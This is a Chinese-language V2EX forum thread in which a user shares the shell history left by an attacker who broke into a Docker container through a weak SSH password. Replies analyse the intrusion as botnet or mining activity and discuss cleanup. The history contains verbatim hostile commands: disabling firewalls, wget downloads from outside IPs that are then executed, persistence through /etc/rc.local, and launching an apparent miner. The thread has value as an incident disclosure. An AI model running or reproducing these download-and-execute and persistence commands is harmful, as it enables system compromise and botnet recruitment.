docker 容器 ssh 的弱密码被攻破了,看看黑客都干了啥

2016-12-29 16:55:57 +08:00
 suconghou
~ # cat .ash_history 
service iptables stop
wget http://211.147.119.195:1611/Linux2.6
chmod 0755 /root/Linux2.6
nohup /root/Linux2.6 > /dev/null 2>&1 &
chmod 777 Linux2.6
./Linux2.6
chmod 0755 /root/Linux2.6
nohup /root/Linux2.6 > /dev/null 2>&1 &
chmod 0777 Linux2.6
chmod u+x Linux2.6
./Linux2.6 &
chmod u+x Linux2.6
./Linux2.6 &
cd /tmp
service iptables stop
wget http://211.147.119.195:1611/Linux2.6
chmod 0755 /root/Linux2.6
nohup /root/Linux2.6 > /dev/null 2>&1 &
chmod 777 Linux2.6
./164
chmod 0755 /root/Linux2.6
nohup /root/Linux2.6 > /dev/null 2>&1 &
chmod 0777 Linux2.6
chmod u+x Linux2.6
./Linux2.6 &
chmod u+x dos6cc4
./Linux2.6 &
cd /tmp
echo "cd  /root/">>/etc/rc.local
echo "./Linux2.6&">>/etc/rc.local
echo "/etc/init.d/iptables stop">>/etc/rc.local
/gisdfoewrsfdf
/bin/busybox cp; /gisdfoewrsfdf
/bin/busybox  mount ;/gisdfoewrsfdf
/bin/busybox  echo -e '\x47\x72\x6f\x70/tmp' > /tmp/.nippon; /bin/busybox  cat /tmp/.nippon; /bin/busybox  rm -f /tmp/.nippon
/bin/busybox  echo -e '\x47\x72\x6f\x70/var/tmp' > /var/tmp/.nippon; /bin/busybox  cat /var/tmp/.nippon; /bin/busybox  rm -f /var/tmp/.nippon
/bin/busybox  echo -e '\x47\x72\x6f\x70/' > //.nippon; /bin/busybox  cat //.nippon; /bin/busybox  rm -f //.nippon
/bin/busybox  echo -e '\x47\x72\x6f\x70/proc' > /proc/.nippon; /bin/busybox  cat /proc/.nippon; /bin/busybox  rm -f /proc/.nippon
/bin/busybox  echo -e '\x47\x72\x6f\x70/dev' > /dev/.nippon; /bin/busybox  cat /dev/.nippon; /bin/busybox  rm -f /dev/.nippon
/bin/busybox  echo -e '\x47\x72\x6f\x70/dev/pts' > /dev/pts/.nippon; /bin/busybox  cat /dev/pts/.nippon; /bin/busybox  rm -f /dev/pts/.nippon
/bin/busybox  echo -e '\x47\x72\x6f\x70/sys' > /sys/.nippon; /bin/busybox  cat /sys/.nippon; /bin/busybox  rm -f /sys/.nippon
/bin/busybox  echo -e '\x47\x72\x6f\x70/sys/fs/cgroup' > /sys/fs/cgroup/.nippon; /bin/busybox  cat /sys/fs/cgroup/.nippon; /bin/busybox  rm -f /sys/fs/cgroup/.nippon
/bin/busybox  echo -e '\x47\x72\x6f\x70/sys/fs/cgroup/systemd' > /sys/fs/cgroup/systemd/.nippon; /bin/busybox  cat /sys/fs/cgroup/systemd/.nippon; /bin/busybox  rm -f /sys/fs/cgroup/systemd/.nippon
/bin/busybox  echo -e '\x47\x72\x6f\x70/sys/fs/cgroup/cpuset' > /sys/fs/cgroup/cpuset/.nippon; /bin/busybox  cat /sys/fs/cgroup/cpuset/.nippon; /bin/busybox  rm -f /sys/fs/cgroup/cpuset/.nippon
/bin/busybox  echo -e '\x47\x72\x6f\x70/sys/fs/cgroup/perf_event' > /sys/fs/cgroup/perf_event/.nippon; /bin/busybox  cat /sys/fs/cgroup/perf_event/.nippon; /bin/busybox  rm -f /sys/fs/cgroup/perf_event/.nippon
/bin/busybox  echo -e '\x47\x72\x6f\x70/sys/fs/cgroup/net_cls' > /sys/fs/cgroup/net_cls/.nippon; /bin/busybox  cat /sys/fs/cgroup/net_cls/.nippon; /bin/busybox  rm -f /sys/fs/cgroup/net_cls/.nippon
/bin/busybox  echo -e '\x47\x72\x6f\x70/sys/fs/cgroup/cpuacct,cpu' > /sys/fs/cgroup/cpuacct,cpu/.nippon; /bin/busybox  cat /sys/fs/cgroup/cpuacct,cpu/.nippon; /bin/busybox  rm -f /sys/fs/cgroup/cpuacct,cpu/.nippon
/bin/busybox  echo -e '\x47\x72\x6f\x70/sys/fs/cgroup/blkio' > /sys/fs/cgroup/blkio/.nippon; /bin/busybox  cat /sys/fs/cgroup/blkio/.nippon; /bin/busybox  rm -f /sys/fs/cgroup/blkio/.nippon
/bin/busybox  echo -e '\x47\x72\x6f\x70/sys/fs/cgroup/memory' > /sys/fs/cgroup/memory/.nippon; /bin/busybox  cat /sys/fs/cgroup/memory/.nippon; /bin/busybox  rm -f /sys/fs/cgroup/memory/.nippon
/bin/busybox  echo -e '\x47\x72\x6f\x70/sys/fs/cgroup/freezer' > /sys/fs/cgroup/freezer/.nippon; /bin/busybox  cat /sys/fs/cgroup/freezer/.nippon; /bin/busybox  rm -f /sys/fs/cgroup/freezer/.nippon
/bin/busybox  echo -e '\x47\x72\x6f\x70/sys/fs/cgroup/devices' > /sys/fs/cgroup/devices/.nippon; /bin/busybox  cat /sys/fs/cgroup/devices/.nippon; /bin/busybox  rm -f /sys/fs/cgroup/devices/.nippon
/bin/busybox  echo -e '\x47\x72\x6f\x70/sys/fs/cgroup/hugetlb' > /sys/fs/cgroup/hugetlb/.nippon; /bin/busybox  cat /sys/fs/cgroup/hugetlb/.nippon; /bin/busybox  rm -f /sys/fs/cgroup/hugetlb/.nippon
/bin/busybox  echo -e '\x47\x72\x6f\x70/dev/mqueue' > /dev/mqueue/.nippon; /bin/busybox  cat /dev/mqueue/.nippon; /bin/busybox  rm -f /dev/mqueue/.nippon
/bin/busybox  echo -e '\x47\x72\x6f\x70/etc/resolv.conf' > /etc/resolv.conf/.nippon; /bin/busybox  cat /etc/resolv.conf/.nippon; /bin/busybox  rm -f /etc/resolv.conf/.nippon
/bin/busybox  echo -e '\x47\x72\x6f\x70/etc/hostname' > /etc/hostname/.nippon; /bin/busybox  cat /etc/hostname/.nippon; /bin/busybox  rm -f /etc/hostname/.nippon
/bin/busybox  echo -e '\x47\x72\x6f\x70/etc/hosts' > /etc/hosts/.nippon; /bin/busybox  cat /etc/hosts/.nippon; /bin/busybox  rm -f /etc/hosts/.nippon
/bin/busybox  echo -e '\x47\x72\x6f\x70/dev/shm' > /dev/shm/.nippon; /bin/busybox  cat /dev/shm/.nippon; /bin/busybox  rm -f /dev/shm/.nippon
/bin/busybox  echo -e '\x47\x72\x6f\x70/var/lib/mysql' > /var/lib/mysql/.nippon; /bin/busybox  cat /var/lib/mysql/.nippon; /bin/busybox  rm -f /var/lib/mysql/.nippon
/bin/busybox  echo -e '\x47\x72\x6f\x70/proc/bus' > /proc/bus/.nippon; /bin/busybox  cat /proc/bus/.nippon; /bin/busybox  rm -f /proc/bus/.nippon
/bin/busybox  echo -e '\x47\x72\x6f\x70/proc/fs' > /proc/fs/.nippon; /bin/busybox  cat /proc/fs/.nippon; /bin/busybox  rm -f /proc/fs/.nippon
/bin/busybox  echo -e '\x47\x72\x6f\x70/proc/irq' > /proc/irq/.nippon; /bin/busybox  cat /proc/irq/.nippon; /bin/busybox  rm -f /proc/irq/.nippon
/bin/busybox  echo -e '\x47\x72\x6f\x70/proc/sys' > /proc/sys/.nippon; /bin/busybox  cat /proc/sys/.nippon; /bin/busybox  rm -f /proc/sys/.nippon
/bin/busybox  echo -e '\x47\x72\x6f\x70/proc/sysrq-trigger' > /proc/sysrq-trigger/.nippon; /bin/busybox  cat /proc/sysrq-trigger/.nippon; /bin/busybox  rm -f /proc/sysrq-trigger/.nippon
/bin/busybox  echo -e '\x47\x72\x6f\x70/proc/kcore' > /proc/kcore/.nippon; /bin/busybox  cat /proc/kcore/.nippon; /bin/busybox  rm -f /proc/kcore/.nippon
/bin/busybox  echo -e '\x47\x72\x6f\x70/proc/timer_list' > /proc/timer_list/.nippon; /bin/busybox  cat /proc/timer_list/.nippon; /bin/busybox  rm -f /proc/timer_list/.nippon
/bin/busybox  echo -e '\x47\x72\x6f\x70/proc/timer_stats' > /proc/timer_stats/.nippon; /bin/busybox  cat /proc/timer_stats/.nippon; /bin/busybox  rm -f /proc/timer_stats/.nippon
/bin/busybox  echo -e '\x47\x72\x6f\x70/proc/sched_debug' > /proc/sched_debug/.nippon; /bin/busybox  cat /proc/sched_debug/.nippon; /bin/busybox  rm -f /proc/sched_debug/.nippon
/gisdfoewrsfdf
/bin/busybox cat /bin/echo ;/gisdfoewrsfdf
cd /tmp; /bin/busybox  wget http://217.23.10.181/bins/usb_bus.x86 -O - > usb_bus ; /bin/busybox  chmod 777 usb_bus ; ./usb_bus ;/gisdfoewrsfdf
service iptables stop
wget http://211.147.112.207:1611/Linux2.4
chmod 0755 /root/Linux2.4
nohup /root/Linux2.4 > /dev/null 2>&1 &
chmod 777 Linux2.4
./Linux2.4
chmod 0755 /root/Linux2.4
nohup /root/Linux2.4 > /dev/null 2>&1 &
chmod 0777 Linux2.4
chmod u+x Linux2.4
./Linux2.4 &
chmod u+x Linux2.4
./Linux2.4 &
cd /tmp
service iptables stop
wget http://211.147.112.207:1611/Linux2.6
chmod 0755 /root/Linux2.6
nohup /root/Linux2.6 > /dev/null 2>&1 &
chmod 777 Linux2.6
service iptables stop
./164
wget http://211.147.112.207:1611/Linux2.4
chmod 0755 /root/Linux2.6
chmod 0755 /root/Linux2.4
nohup /root/Linux2.6 > /dev/null 2>&1 &
nohup /root/Linux2.4 > /dev/null 2>&1 &
chmod 0777 Linux2.6
chmod 777 Linux2.4
chmod u+x Linux2.6
./Linux2.4
./Linux2.6 &
chmod 0755 /root/Linux2.4
chmod u+x dos6cc4
nohup /root/Linux2.4 > /dev/null 2>&1 &
./Linux2.6 &
chmod 0777 Linux2.4
cd /tmp
chmod u+x Linux2.4
service iptables stop
./Linux2.4 &
wget http://211.147.112.207:1611/dd-wrt
chmod u+x Linux2.4
chmod 0755 /root/dd-wrt
./Linux2.4 &
nohup /root/dd-wrt > /dev/null 2>&1 &
cd /tmp
chmod 777 dd-wrt
service iptables stop
./dd-wrt
wget http://211.147.112.207:1611/Linux2.6
chmod 0755 /root/dd-wrt
chmod 0755 /root/Linux2.6
nohup /root/dd-wrt > /dev/null 2>&1 &
nohup /root/Linux2.6 > /dev/null 2>&1 &
chmod 0777 dd-wrt
chmod 777 Linux2.6
chmod u+x dd-wrt
./164
./dd-wrt &
chmod 0755 /root/Linux2.6
chmod u+x dd-wrt
nohup /root/Linux2.6 > /dev/null 2>&1 &
./dd-wrt &
chmod 0777 Linux2.6
cd /tmp
chmod u+x Linux2.6
service iptables stop
./Linux2.6 &
wget http://211.147.112.207:1611/linux-arm
chmod u+x dos6cc4
chmod 0755 /root/linux-arm
./Linux2.6 &
nohup /root/linux-arm > /dev/null 2>&1 &
cd /tmp
chmod 777 linux-arm
service iptables stop
./linux-arm
wget http://211.147.112.207:1611/dd-wrt
chmod 0755 /root/linux-arm
nohup /root/linux-arm > /dev/null 2>&1 &
chmod 0777 linux-arm
chmod u+x linux-arm
chmod 0755 /root/dd-wrt
nohup /root/dd-wrt > /dev/null 2>&1 &
chmod 777 dd-wrt
./dd-wrt
./linux-arm &
chmod 0755 /root/dd-wrt
chmod u+x linux-arm
nohup /root/dd-wrt > /dev/null 2>&1 &
./linux-arm &
chmod 0777 dd-wrt
cd /tmp
chmod u+x dd-wrt
service iptables stop
./dd-wrt &
wget http://211.147.112.207:1611/linux-mips
chmod u+x dd-wrt
./dd-wrt &
chmod 0755 /root/linux-mips
nohup /root/linux-mips > /dev/null 2>&1 &
cd /tmp
chmod 777 linux-mips
service iptables stop
./linux-mips
wget http://211.147.112.207:1611/linux-arm
chmod 0755 /root/linux-mips
chmod 0755 /root/linux-arm
nohup /root/linux-mips > /dev/null 2>&1 &
nohup /root/linux-arm > /dev/null 2>&1 &
chmod 0777 linux-mips
chmod 777 linux-arm
chmod u+x linux-mips
./linux-arm
./linux-mips &
chmod 0755 /root/linux-arm
chmod u+x linux-mips
nohup /root/linux-arm > /dev/null 2>&1 &
./linux-mips &
chmod 0777 linux-arm
cd /tmp
chmod u+x linux-arm
service iptables stop
./linux-arm &
wget http://211.147.112.207:1611/taskhost.exe
chmod u+x linux-arm
chmod 0755 /root/taskhost.exe
./linux-arm &
nohup /root/taskhost.exe > /dev/null 2>&1 &
cd /tmp
chmod 777 taskhost.exe
service iptables stop
./taskhost.exe
wget http://211.147.112.207:1611/linux-mips
chmod 0755 /root/taskhost.exe
chmod 0755 /root/linux-mips
nohup /root/taskhost.exe > /dev/null 2>&1 &
nohup /root/linux-mips > /dev/null 2>&1 &
chmod 0777 taskhost.exe
chmod 777 linux-mips
chmod u+x taskhost.exe
./linux-mips
./taskhost.exe &
chmod 0755 /root/linux-mips
chmod u+x taskhost.exe
nohup /root/linux-mips > /dev/null 2>&1 &
./taskhost.exe &
chmod 0777 linux-mips
chmod u+x linux-mips
cd /tmp
./linux-mips &
echo "cd  /root/">>/etc/rc.local
chmod u+x linux-mips
echo "./Linux2.4&">>/etc/rc.local
./linux-mips &
echo "./Linux2.6&">>/etc/rc.local
cd /tmp
echo "./dd-wrt&">>/etc/rc.local
service iptables stop
echo "./linux-arm&">>/etc/rc.local
wget http://211.147.112.207:1611/taskhost.exe
echo "./linux-mips&">>/etc/rc.local
chmod 0755 /root/taskhost.exe
echo "./taskhost&">>/etc/rc.local
nohup /root/taskhost.exe > /dev/null 2>&1 &
echo "/etc/init.d/iptables stop">>/etc/rc.local
chmod 777 taskhost.exe
./taskhost.exe
chmod 0755 /root/taskhost.exe
nohup /root/taskhost.exe > /dev/null 2>&1 &
chmod 0777 taskhost.exe
chmod u+x taskhost.exe
./taskhost.exe &
chmod u+x taskhost.exe
./taskhost.exe &
cd /tmp
echo "cd  /root/">>/etc/rc.local
echo "./Linux2.4&">>/etc/rc.local
echo "./Linux2.6&">>/etc/rc.local
echo "./dd-wrt&">>/etc/rc.local
echo "./linux-arm&">>/etc/rc.local
echo "./linux-mips&">>/etc/rc.local
echo "./taskhost&">>/etc/rc.local
echo "/etc/init.d/iptables stop">>/etc/rc.local
/etc/init.d/iptables stop
service iptables stop
SuSEfirewall2 stop
reSuSEfirewall2 stop
cd /tmp
wget http://115.236.92.99:12345/bins.sh
chmod 777 bins.sh
./bins.sh
/etc/init.d/iptables stop
service iptables stop
SuSEfirewall2 stop
reSuSEfirewall2 stop
cd /tmp
wget http://115.236.92.99:12345/marlin
/etc/init.d/iptables stop
service iptables stop
SuSEfirewall2 stop
reSuSEfirewall2 stop
CD /tmp
wget http://115.236.92.99:8846/2500
chmod 777 2500
./2500 >/dev/null 2>&1 &
/etc/init.d/iptables stop
service iptables stop
SuSEfirewall2 stop
reSuSEfirewall2 stop
CD /tmp
wget http://115.236.92.99:12345/2500
chmod 777 2500
./2500 >/dev/null 2>&1 &
/etc/init.d/iptables stop
service iptables stop
SuSEfirewall2 stop
reSuSEfirewall2 stop
cd /tmp
wget http://115.236.92.99:12345/marlin
chmod 777 marlin
./marlin -u 55489a27a09840cc82aec8c48858d30ec184344b162fb99e904f41e860a4dfad53db10d7b3f7.AK1 -I 20
5322 次点击
所在节点    信息安全
12 条回复
suconghou
2016-12-29 17:08:31 +08:00
/etc/init.d # ls
DbSecuritySpt QsystemsshMmt VsystemsshMdt mariadb rc.local selinux
/etc/init.d # rm *t
/etc/init.d # ls
mariadb rc.local selinux
/etc/init.d # cat selinux
#!/bin/bash
/usr/bin/bsd-port/getty
/etc/init.d # ls -lh /usr/bin/bsd-port/getty
-rwxr-xr-x 1 root root 1.2M Dec 17 15:49 /usr/bin/bsd-port/getty
/etc/init.d # md5sum /usr/bin/bsd-port/getty
2dafa3cb07d8e13ae9bf9136ed97403c /usr/bin/bsd-port/getty
/etc/init.d # md5sum /bin/ps
2dafa3cb07d8e13ae9bf9136ed97403c /bin/ps
/etc/init.d # md5sum /bin/netstat
2dafa3cb07d8e13ae9bf9136ed97403c /bin/netstat
/etc/init.d # md5sum /usr/bin/lsof
2dafa3cb07d8e13ae9bf9136ed97403c /usr/bin/lsof
/etc/init.d #


都是这个 2dafa
swulling
2016-12-29 17:12:24 +08:00
这个不叫『黑客』,这个叫『脚本小子』
ryd994
2016-12-29 17:12:50 +08:00
一般不建议用 docker 做蜜罐,因为如果对方看出来的话,想打穿还是有可能的
suconghou
2016-12-29 17:19:36 +08:00
无意间成了蜜罐 已停用 ssh
megatron
2016-12-29 17:52:53 +08:00
这是照着教材来的?
说个好玩儿的,前两天一个测试机被入侵了,入侵者竟然帮我升级了 jdk ,我想了半天也不知道为什么。
xss
2016-12-29 18:18:04 +08:00
这个是自动化脚本干的, 并不是人进行的操作.
应该是僵尸网络中的节点在找更多的节点, 加入僵尸网络.
suconghou
2016-12-29 18:42:45 +08:00
查了一下 可能是透过 redis 入侵的, cron 文件都被改了,redis 我开着外网端口来着.
tanszhe
2016-12-29 19:02:45 +08:00
干什么了什么啊?求大神解释一下这段代码干了什么?
dant
2016-12-29 23:51:20 +08:00
挖矿吧
maxwel1
2017-01-11 13:49:13 +08:00
测试用的 centos ,还在调试,然后过了个周末发现被执行了上面那个脚本,如果不重装的话,怎么清理干净呢?有什么办法吗?
suconghou
2017-01-11 14:02:23 +08:00
@maxwel1 建议备份重装 ps lsof netstat 还有开机启动项,动态链接库,很多都被替换了.
maxwel1
2017-01-19 00:35:00 +08:00
@suconghou 多谢,看来只好重装了,最近这两周没空搞它,直接关机了。。

这是一个专为移动设备优化的页面(即为了让你能够在 Google 搜索结果里秒开这个页面),如果你希望参与 V2EX 社区的讨论,你可以继续到 V2EX 上打开本讨论主题的完整版本。

https://www.v2ex.com/t/331051

V2EX 是创意工作者们的社区,是一个分享自己正在做的有趣事物、交流想法,可以遇见新朋友甚至新机会的地方。

V2EX is a community of developers, designers and creative people.

© 2021 V2EX